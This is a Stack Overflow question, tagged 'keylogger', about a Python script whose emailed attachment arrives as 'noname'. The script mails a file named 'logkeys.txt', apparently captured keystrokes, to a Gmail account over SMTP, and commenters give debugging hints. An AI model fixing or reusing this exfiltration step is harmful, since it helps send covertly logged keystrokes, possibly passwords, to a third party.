# Email attachment received as 'noname' with PYTHON

Tags: python, email, keylogger

I'm trying to send an email with attachment with the Python 'email' module, everything is working fine but the attachment is getting received by the receiver as 'noname'.

Check my code below:

```
import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

# Setup email log message
logfile = "log.txt"
sender = "xxxxx@gmail.com"
password = "xxxxx"
receiver = "xxxxx@gmail.com"
subject = "Log file ALERT!"
body = """
Hello Dave,
Here is your log file.
"""

email = MIMEMultipart()
email["From"] = sender
email["To"] = receiver
email["Subject"] = subject

email.attach(MIMEText(body, "plain"))
attachment = "logkeys.txt"
attached_file = open(attachment, 'rb')
payload = MIMEBase('application', 'octet-stream')
payload.set_payload((attached_file).read())
encoders.encode_base64(payload)
email.add_header('Content-Disposition', 'attachment', filename=attachment)
email.attach(payload)

session = smtplib.SMTP_SSL('smtp.gmail.com', 465) #use gmail with port
session.login(sender, password) #login with mail_id and password
session.sendmail(sender, receiver, email.as_string())
session.quit()
```

Where is the error coming from?

I already changed header and payload to other options available but it's still sending as 'noname'

Comment: Classic typo. It's `octet-stream`, not `octate-stream`.

Comment: Thanks, I just changed it now but still sending as 'noname'. Could you please look through other parts of it?

Comment: If you changed things, remember to update your post.

Comment: Done now, I'm new to StackOverflow is why.

Comment: Welcome to Stackoverflow. Please remember to read the [posting guidelines](/help/how-to-ask) if this is your first post, as it contains a lot of important information.

Comment: Also, remember to search for your same problem: https://stackoverflow.com/questions/20831788/email-attachment-received-as-noname sounds like it applies to your situation, too (pay close attention to what thing you're adding headers to).

Comment: Alright, will check them out. I really forgot to remove those informations at first, maybe it's because they're not that personal/important.